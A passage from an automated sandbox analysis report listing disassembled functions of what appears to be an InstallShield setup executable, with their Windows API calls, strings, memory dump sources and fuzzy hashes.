                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00457832: __EH_prolog3_GS.LIBCMT ref: 0045783C
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • VerLanguageNameW.KERNEL32(?,00000000,00000104,?,00000104,00000000), ref: 0041E925
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$H_prolog3String$Free$AllocLanguageName
                                                                                                                                                                          • String ID: $.ini$0x%04x$0x0409$HsG$HsG$Languages
                                                                                                                                                                          • API String ID: 688613020-3369345278
                                                                                                                                                                          • Opcode ID: 76fd5e54b8e6a84f8170e095a24250969687b9b7881741264278595d774080c2
                                                                                                                                                                          • Instruction ID: e70d1e0cfe5ab156710d98ac732bee141d2c2faacf9419555326adf521d50b6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 76fd5e54b8e6a84f8170e095a24250969687b9b7881741264278595d774080c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 70A1A170D04258EADB10EBA5CC46BEEBBB4AF15304F4440DEE445B71C2DBB94B48DBA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004395EC, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004395F6
                                                                                                                                                                            • Part of subcall function 0041F375: __EH_prolog3_GS.LIBCMT ref: 0041F37C
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 004396FB
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 00439760
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,IS_,00000000,00000000,?,00000104), ref: 004397B5
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000104), ref: 004397D8
                                                                                                                                                                            • Part of subcall function 0040F187: SysFreeString.OLEAUT32(00000000), ref: 0040F196
                                                                                                                                                                            • Part of subcall function 0043D95F: __EH_prolog3.LIBCMT ref: 0043D966
                                                                                                                                                                            • Part of subcall function 0043D95F: CloseHandle.KERNEL32(?,00000008,0043EDE4,?,?,00483E18,?,?,00000000,00000000), ref: 0043D9C3
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0043990C
                                                                                                                                                                            • Part of subcall function 00418DB7: __EH_prolog3_GS.LIBCMT ref: 00418DBE
                                                                                                                                                                            • Part of subcall function 00418DB7: LoadLibraryW.KERNEL32(?,?,00000001,0000006C,00427B39,?,00000000,?,00000000), ref: 00418DE7
                                                                                                                                                                            • Part of subcall function 00418DB7: GetLastError.KERNEL32 ref: 00418DFE
                                                                                                                                                                            • Part of subcall function 00419082: __EH_prolog3.LIBCMT ref: 00419089
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$File$FreeH_prolog3_String$H_prolog3NameTemp$AttributesCloseDeleteHandleLibraryLoadModulePath
                                                                                                                                                                          • String ID: HsG$ISSetup.dll$IS_
                                                                                                                                                                          • API String ID: 2103059120-3294081037
                                                                                                                                                                          • Opcode ID: d87e0d1073ffd8b779ad16f26507bf306cf59d8d602ded7ec2c15259f1899ff3
                                                                                                                                                                          • Instruction ID: d1d4f8ed019ee4de056304f90647de4b0c89f4b291602d0943f11ac2d2dac808
                                                                                                                                                                          • Opcode Fuzzy Hash: d87e0d1073ffd8b779ad16f26507bf306cf59d8d602ded7ec2c15259f1899ff3
                                                                                                                                                                          • Instruction Fuzzy Hash: DEA18930904258EFCB25EB64CC99BDDBBB8AB19304F5041EEE009A71A1DB785F88CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041A194, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 170libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041A19E
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A1B0
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400,?,00000000,Running after reboot,?,00000001,Setup.cpp), ref: 0041A21B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString$AddressFileH_prolog3_ModuleNameProc
                                                                                                                                                                          • String ID: HsG$HsG$ProductCode$RunISMSISetup$Startup$setup.ini
                                                                                                                                                                          • API String ID: 585182573-410899784
                                                                                                                                                                          • Opcode ID: 98784b6183912243f2d9471099c408e7ce55118518920cb007bab6d99c5bdbc1
                                                                                                                                                                          • Instruction ID: 0957057a987c12b67f723429a7cf051bb6bca496a84ec87bb44cdcf17f9241c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 98784b6183912243f2d9471099c408e7ce55118518920cb007bab6d99c5bdbc1
                                                                                                                                                                          • Instruction Fuzzy Hash: 49717E30801258EECB15DBA4CD94BDDBB74AF15308F1440EEE4497B192DBB89F88CB55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416E3A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00416E41
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00416E9D
                                                                                                                                                                          • SetWindowTextW.USER32(?,-00000004), ref: 00416EE3
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00416F21
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00416F29
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00416F3F
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00416F55
                                                                                                                                                                          • DeleteObject.GDI32 ref: 00416F78
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ErrorItemLastShow$DeleteDialogH_prolog3_ObjectText
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 276247898-1835203436
                                                                                                                                                                          • Opcode ID: 78859d42d7e7ef9faba6097dc38228c4d6f5e39ec9f943eee3fd1315796edf2d
                                                                                                                                                                          • Instruction ID: 32a1438aed9bd3f86af79f989fb10cae18025b3ec74c94308b832d7c68902945
                                                                                                                                                                          • Opcode Fuzzy Hash: 78859d42d7e7ef9faba6097dc38228c4d6f5e39ec9f943eee3fd1315796edf2d
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C31FD70900204EBDB10EFA4DC89AEE3B78EB14314F52413FF505A72A2DB389949CB2C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403760, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,74B04C30,?,74B04D40,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?,?), ref: 004037B1
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?,?), ref: 004037E1
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?), ref: 00403831
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040384D
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403858
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403878
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: 5@$HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-546635779
                                                                                                                                                                          • Opcode ID: fbafaa1693c874dc00c61cee88e1bbe901b1ae54a5fa353eabf8473e2c0fa7c6
                                                                                                                                                                          • Instruction ID: 871e10d8fcb673fc33f50acdd71b1ffce2ec75293a1789f6cef84babbc413505
                                                                                                                                                                          • Opcode Fuzzy Hash: fbafaa1693c874dc00c61cee88e1bbe901b1ae54a5fa353eabf8473e2c0fa7c6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B414BB1900609EFDB00DFA5C945B9EBBF4FF08314F10813AE809A7761E779A915CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040CBCD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 72windowregistryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(0000000C,InstallShieldMSIDelete10), ref: 0040CBFA
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040CC09
                                                                                                                                                                          • GetStockObject.GDI32(00000004), ref: 0040CC14
                                                                                                                                                                          • RegisterClassW.USER32 ref: 0040CC2B
                                                                                                                                                                          • CreateWindowExW.USER32 ref: 0040CC4F
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CC7C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$ClassCreateCursorIconMessageObjectRegisterStockWindow
                                                                                                                                                                          • String ID: InstallShieldMSIDelete10
                                                                                                                                                                          • API String ID: 195796534-324135598
                                                                                                                                                                          • Opcode ID: adb89a01bead356bb743f263100584f80e17619f8ad141a653908dc69371d8b4
                                                                                                                                                                          • Instruction ID: e61589a4caaa5cfe348c24567c4c13d8ab35480bda4c0a82e888dee5ad5759ef
                                                                                                                                                                          • Opcode Fuzzy Hash: adb89a01bead356bb743f263100584f80e17619f8ad141a653908dc69371d8b4
                                                                                                                                                                          • Instruction Fuzzy Hash: D01138F1D00619ABEB109FE5DC88ADF7ABDEB08744F11413AF50AE2240D77898098B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042F843, Relevance: 15.3, APIs: 10, Instructions: 262windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMessageSend$DeleteDialogH_prolog3_ObjectTextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 804393631-0
                                                                                                                                                                          • Opcode ID: a6122b05e47634fdfd8ab8451ec0760bce8ec09106424b8cd9969a751aaebe2b
                                                                                                                                                                          • Instruction ID: f39924c76f32e81e8879c03e6409568c4da96c8dad0d7c173ab8e69a6c804ee5
                                                                                                                                                                          • Opcode Fuzzy Hash: a6122b05e47634fdfd8ab8451ec0760bce8ec09106424b8cd9969a751aaebe2b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A919CB1601200AFD704DF65EC8AD6BBB7DFF4A305B60007AF5058B261DB769E41CB29
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043E477, Relevance: 15.1, APIs: 10, Instructions: 141fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043E47E
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000003C,0043E0D3,?,?,00000044,0043EBF5,00000008,00000010,0043D71F), ref: 0043E4AE
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0043E4D7
                                                                                                                                                                          • GetSystemInfo.KERNEL32(000000FF), ref: 0043E4F9
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,?), ref: 0043E50D
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,000000F8), ref: 0043E541
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0043E55F
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000008,00000004,00000000,00000000,?), ref: 0043E571
                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,000000F8), ref: 0043E59F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043E5F2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$View$CreateRead$ErrorH_prolog3InfoLastMappingSystemUnmap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2433704077-0
                                                                                                                                                                          • Opcode ID: 48295249430b2d81b019a7e284f5c011ea3b1818ef68984c73926e42bdc3f1ba
                                                                                                                                                                          • Instruction ID: 9f44de6e9c4080a6bd25bec2e2117addd485c63f55dda09374f6778c30417793
                                                                                                                                                                          • Opcode Fuzzy Hash: 48295249430b2d81b019a7e284f5c011ea3b1818ef68984c73926e42bdc3f1ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 80517170901215EFDB21DFA5CC85BAFBBB4BF08709F50412AE501A72D1E7B89E41CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004157FC, Relevance: 15.1, APIs: 10, Instructions: 138filethreadwindowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00415806
                                                                                                                                                                            • Part of subcall function 00415AB7: lstrlenW.KERNEL32(?), ref: 00415AC2
                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,00000830,0042203B,?,?), ref: 00415821
                                                                                                                                                                          • _memset.LIBCMT ref: 00415842
                                                                                                                                                                          • CreateThread.KERNEL32 ref: 004158D5
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00415900
                                                                                                                                                                          • PeekMessageW.USER32 ref: 00415947
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 0041595C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MultipleObjectsWait$CopyCreateFileH_prolog3_MessagePeekThread_memsetlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4111908098-0
                                                                                                                                                                          • Opcode ID: 65d4c742271cfd3dc60a1702bf0ae3f07c17ee62d2d954eee1c27a6055a356be
                                                                                                                                                                          • Instruction ID: 98610f40a411d0467980053612d0a366f5854de4d7ed70487b933b1cee140c02
                                                                                                                                                                          • Opcode Fuzzy Hash: 65d4c742271cfd3dc60a1702bf0ae3f07c17ee62d2d954eee1c27a6055a356be
                                                                                                                                                                          • Instruction Fuzzy Hash: C041D3B1900614EBDB20AF708C45BEE76BDBF84724F00816AB559A7291DF784E818B98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040D7C7, Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 386COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040D7D1
                                                                                                                                                                            • Part of subcall function 00419A17: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000,?,00000008,00000000,?,0040D7F7,000000FF,?), ref: 00419A3A
                                                                                                                                                                            • Part of subcall function 00419AD9: GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
                                                                                                                                                                            • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
                                                                                                                                                                            • Part of subcall function 00419AD9: HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
                                                                                                                                                                            • Part of subcall function 00419AD9: ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
                                                                                                                                                                            • Part of subcall function 00419AD9: _strlen.LIBCMT ref: 00419B47
                                                                                                                                                                            • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
                                                                                                                                                                            • Part of subcall function 00419AD9: HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
